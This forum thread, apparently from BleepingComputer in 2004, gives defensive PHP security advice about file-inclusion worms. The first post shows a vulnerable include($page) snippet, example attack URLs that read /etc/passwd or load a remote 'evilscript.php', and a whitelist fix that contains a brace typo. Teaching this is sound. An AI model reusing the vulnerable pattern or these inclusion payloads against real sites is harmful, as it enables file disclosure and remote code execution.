Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Lock down your PHP


  • Please log in to reply
3 replies to this topic

#1 ColdinCbus

ColdinCbus

  • Members
  • 312 posts
  • OFFLINE
  •  
  • Local time:12:49 PM

Posted 29 December 2004 - 10:14 AM

You may or may not know that several new worms have been release lately that target sites using PHP. http://www.k-otik.com/exploits/20041225.PhpIncludeWorm.php

If your page is using Include() and/or Require() functions, make sure you are doing an error check to pull only the files you want.

1. Never include, require, or otherwise open a file with a filename based on user input, without thoroughly checking it first.

Take the following example:

   if(isset($page))
    {
      include($page);
    }
Since there is no validation being done on $page, a malicious user could hypothetically call your script like this (assuming register_globals is set to ON):

    script.php?page=/etc/passwd

Therefore causing your script to include the servers /etc/passwd file. When a non PHP file is include()'d or require()'d, it's displayed as HTML/Text, not parsed as PHP code.

On many PHP installations, the include() and require() functions can include remote files. If the malicious user were to call your script like this:

    script.php?page=http://mysite.com/evilscript.php

He would be able to have evilscript.php output any PHP code that he or she wanted your script to execute. Imagine if the user sent code to delete content from your database or even send sensitive information directly to the browser.

Solution: validate the input. One method of validation would be to create a list of acceptable pages. If the input did not match any of those pages, an error could be displayed.

   $pages = array('index.html', 'page2.html', 'page3.html');
    if( in_array($page, $pages) )
    {
        include($page);
    {
    else
    {
       die("Nice Try.");
    }

More good PHP security tips can be found here http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/

I have been fixing hacked websites the last couple days because the scripts did not have a good error check.

Edited by ColdinCbus, 29 December 2004 - 10:15 AM.


BC AdBot (Login to Remove)

 


#2 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,504 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:12:49 PM

Posted 29 December 2004 - 12:31 PM

Very informative post!

#3 Canoeingkidd

Canoeingkidd

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:11:49 AM

Posted 29 December 2004 - 04:42 PM

Thank you! I'll check out that link. :thumbsup:

#4 Angoid

Angoid

  • Security Colleague
  • 299 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:East Midlands UK
  • Local time:05:49 PM

Posted 06 March 2005 - 01:36 PM

Nice.

I write PHP code, and although yet to encounter problems of this nature, it's worth being aware of it for future consideration.
:thumbsup:

Helping a loved one through a mental health issue?  Remember ALGEE...

Assess the risk | Listen nonjudgementally | Give reassurance and info | Encourage professional help | Encourage self-help and support network




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users